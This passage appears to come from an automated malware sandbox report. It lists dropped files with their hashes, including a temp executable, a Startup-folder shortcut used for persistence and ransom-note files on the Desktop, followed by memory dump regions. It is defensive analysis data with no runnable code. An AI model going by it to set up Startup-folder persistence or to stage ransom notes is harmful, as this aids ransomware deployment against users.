                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_da31osdp.lko.ps1

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            60B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sx3epa5k.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            232KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            75a586728aa168951b1c48f28f34c553

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            4e150e7cbffa43fb120876221343af15b3332049

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            9c2a20b67ede0cc57eb3e3708ead52d98ad6065d5a539319d771846acfac6a75

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            586aff19e18c0b30c9e3aa859c3dc028c2472625e98ef7c46e023118ce518cea149f4a8fe45dc3d43aba2e2e8a9faeb9ef34c25fa5b745e5fa294bbcdde04851

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1006B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            ed4f11ae6e7ac9dcd04ebdd9eb597734

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            d35dd25f4bb68ddbf63612427e223b9437fc61de

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            67c05a030c24248de0aa875d6d13dbdaaa6514c777a60d188feb6f4e3bcd831d

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            b7e43d2187d17638f4ce56c09e7b02a32f3d83c33d575839965aa421a305efef6c4177b02155644295dc6555c41fc0304230c574538c1e9d304794fb6037fef7

                                                                                                                                                                                                          • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            152ce0a8de07a6f7ad528e315c29c92e

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            0a7344d41b6774e3d6aee3b3a7c46eb34fb277ad

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            5355a26e38d8d7f4439a0af319de4787496aaf21eeddf407f2c7eba4585302ed

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            c9d7996f5b18c33adaf25d53fd163fda66423b1d880c6ba31fabb3e5e63341d52ba08c3918f797d037f2103ca8b3a09f58f6e2c6826882bd03e7f8ae23c89ac1

                                                                                                                                                                                                          • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            446B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            13450b3972017df8b5720160dfd32431

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            1ceb08bdc8270879c1ecc0320432aef8e4c9c78a

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            44f44e16aa971ac67aaf10ecb821cb55f47fdca7da000f8cd1f825d5ba685aad

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            15b2da7a9c231c96acd18f4a403312ac49a85b4b4797f9d753f56b55d4aa64c8e0bd6d1f274eaef9fb3871c8128c6f7059ddf0725c60616e9b570097141f22ab

                                                                                                                                                                                                          • C:\Users\Admin\Downloads\Unconfirmed 289648.crdownload

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            13.6MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            10dc710dd495e9078ce79b26e18591e0

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            aef434d6b77158dd2accd746bbc727bbc3367adc

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            be5389a28e952d7ab2d9447c1bdb8eb7d11b24cb02e4b18da367715c2acfdd15

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            959c5cb47b9d1c21ddfe2eaac14e0c99c758aab85036705c072525e70255957abc97412ab0ceadd2adbebc1b176699614f71bf50689cf9ff97891e6216a15dc5

                                                                                                                                                                                                          • C:\Windows\System32\drivers\hitmanpro37.sys

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            41KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            55b9678f6281ff7cb41b8994dabf9e67

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            95a6a9742b4279a5a81bef3f6e994e22493bbf9f

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            eb5d9df12ae2770d0e5558e8264cbb1867c618217d10b5115690ab4dcfe893c6

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            d2270c13dc8212b568361f9d7d10210970b313d8cd2b944f63a626f6e7f2feb19671d3fcdbdf35e593652427521c7c18050c1181dc4c114da96db2675814ab40

                                                                                                                                                                                                          • memory/1504-629-0x000002E5C77D0000-0x000002E5C77D1000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/1504-639-0x000002E5C77D0000-0x000002E5C77D1000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/1504-633-0x000002E5C77D0000-0x000002E5C77D1000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/1504-634-0x000002E5C77D0000-0x000002E5C77D1000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/1504-627-0x000002E5C77D0000-0x000002E5C77D1000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/1504-628-0x000002E5C77D0000-0x000002E5C77D1000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/1504-638-0x000002E5C77D0000-0x000002E5C77D1000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/1504-635-0x000002E5C77D0000-0x000002E5C77D1000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/1504-636-0x000002E5C77D0000-0x000002E5C77D1000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/1504-637-0x000002E5C77D0000-0x000002E5C77D1000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/2560-0-0x00007FF87C0C3000-0x00007FF87C0C5000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            8KB

                                                                                                                                                                                                          • memory/2560-265-0x00007FF87C0C0000-0x00007FF87CB82000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                          • memory/2560-177-0x00007FF87C0C0000-0x00007FF87CB82000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                          • memory/2560-1-0x0000000000550000-0x000000000056A000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            104KB

                                                                                                                                                                                                          • memory/2560-2-0x00007FF87C0C0000-0x00007FF87CB82000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                          • memory/2560-172-0x00007FF87C0C3000-0x00007FF87C0C5000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            8KB

                                                                                                                                                                                                          • memory/3488-16-0x00007FF87C0C0000-0x00007FF87CB82000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                          • memory/3488-19-0x00007FF87C0C0000-0x00007FF87CB82000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                          • memory/3488-15-0x00007FF87C0C0000-0x00007FF87CB82000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                          • memory/3488-10-0x00000178748C0000-0x00000178748E2000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            136KB

                                                                                                                                                                                                          • memory/3488-3-0x00007FF87C0C0000-0x00007FF87CB82000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                          • memory/3488-4-0x00007FF87C0C0000-0x00007FF87CB82000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            10.8MB